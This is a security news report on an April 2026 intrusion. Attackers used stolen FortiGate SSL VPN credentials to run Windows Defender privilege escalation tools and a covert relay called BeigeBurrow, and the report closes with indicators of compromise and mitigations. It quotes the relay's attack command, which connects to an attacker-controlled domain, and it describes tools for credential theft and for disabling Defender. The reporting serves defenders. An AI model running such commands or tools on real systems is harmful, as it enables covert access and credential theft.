Cyberattackers Exploit FortiGate SSL VPN to Deploy Nightmare-Eclipse Tools
In a recent cybersecurity incident, attackers have exploited vulnerabilities in FortiGate SSL VPNs to deploy a suite of privilege escalation tools known as Nightmare-Eclipse. This marks the first confirmed use of these tools in a live enterprise environment, raising significant concerns for security teams worldwide.
The Nightmare-Eclipse Toolkit
Developed by a security researcher operating under the pseudonym Chaotic Eclipse, the Nightmare-Eclipse toolkit comprises three primary tools: BlueHammer, RedSun, and UnDefend. These tools exploit logic flaws in Windows Defender’s privileged operations, enabling attackers to escalate privileges from standard user accounts to SYSTEM-level access or to disable Defender’s security functions without administrative rights.
– BlueHammer: Targets vulnerabilities in Windows Defender to extract Security Account Manager (SAM) credentials.
– RedSun: Overwrites critical system files to gain elevated privileges.
– UnDefend: Disables Windows Defender’s security features, leaving systems unprotected.
Microsoft addressed the BlueHammer vulnerability in its April 2026 Patch Tuesday update, assigning it CVE-2026-33825. However, RedSun and UnDefend remain unpatched zero-day vulnerabilities, posing ongoing risks to fully updated Windows systems.
Incident Overview
The intrusion was first detected on April 10, 2026, when a binary named `FunnyApp.exe`—a direct build from the public BlueHammer GitHub repository—was executed from a user’s Pictures folder. Windows Defender quarantined the file, identifying it as `Exploit:Win32/DfndrPEBluHmr.BZ`.
On April 16, further suspicious activities were observed:
– Execution of `RedSun.exe` from the user’s Downloads directory.
– Multiple executions of `undef.exe` (UnDefend binary) from directories with short, two-letter names like `\ks\` and `\kk\`.
Notably, the attacker used the misspelled flag `-agressive` and an ineffective `-h` help flag with UnDefend, indicating a lack of familiarity with the tool.
Despite these attempts, the privilege escalation efforts were unsuccessful:
– BlueHammer failed to extract SAM credentials.
– RedSun did not overwrite `TieringEngineService.exe` in the System32 directory.
– UnDefend was terminated during active remediation efforts.
Compromised FortiGate SSL VPN Access
Analysis of VPN logs revealed that on April 15, 2026, at 13:44 UTC, an attacker initiated an SSL VPN connection to the victim’s FortiGate firewall using valid user credentials from IP address `78.29.48[.]29`, geolocated in Russia. Subsequent unauthorized sessions were observed from IP addresses in Singapore (`212.232.23[.]69`) and Switzerland (`179.43.140[.]214`), suggesting credential abuse and potential resale or sharing.
BeigeBurrow: A Covert TCP Relay
Among the tools deployed, a Go-compiled Windows binary named BeigeBurrow stood out. Executed as `agent.exe -server staybud.dpdns[.]org:443 -hide`, BeigeBurrow utilizes HashiCorp’s Yamux multiplexing library to establish a persistent, covert TCP relay between the compromised host and attacker-controlled infrastructure over port 443—a port rarely blocked by enterprise firewalls. Unlike the privilege escalation tools, BeigeBurrow successfully connected outbound, achieving its intended purpose.
Indicators of Compromise (IoCs)
Organizations should be vigilant for the following IoCs associated with this attack:
– Files and Executables:
– `FunnyApp.exe`
– `RedSun.exe`
– `undef.exe`
– `agent.exe`
– Directories:
– Execution from user directories such as `\Pictures\`, `\Downloads\`, and short-named folders like `\ks\`, `\kk\`.
– IP Addresses:
– `78.29.48[.]29` (Russia)
– `212.232.23[.]69` (Singapore)
– `179.43.140[.]214` (Switzerland)
– Domains:
– `staybud.dpdns[.]org`
Mitigation Strategies
To protect against similar attacks, organizations should implement the following measures:
1. Patch Management: Ensure all systems are updated with the latest security patches, including Microsoft’s April 2026 updates addressing CVE-2026-33825.
2. Monitor VPN Access: Regularly review VPN logs for unusual access patterns, especially from foreign IP addresses or multiple geolocations.
3. Enhance Authentication: Implement multi-factor authentication (MFA) for VPN access to reduce the risk of credential abuse.
4. Restrict Privileges: Limit user privileges to the minimum necessary, reducing the potential impact of compromised accounts.
5. Network Segmentation: Segment networks to contain potential intrusions and prevent lateral movement by attackers.
6. Endpoint Detection and Response (EDR): Deploy EDR solutions to detect and respond to suspicious activities promptly.
7. User Education: Train employees on recognizing phishing attempts and the importance of secure password practices.
Conclusion
The exploitation of FortiGate SSL VPNs to deploy Nightmare-Eclipse tools underscores the evolving tactics of cybercriminals and the critical need for robust cybersecurity measures. Organizations must remain vigilant, continuously update their defenses, and educate their workforce to mitigate the risks posed by such sophisticated attacks.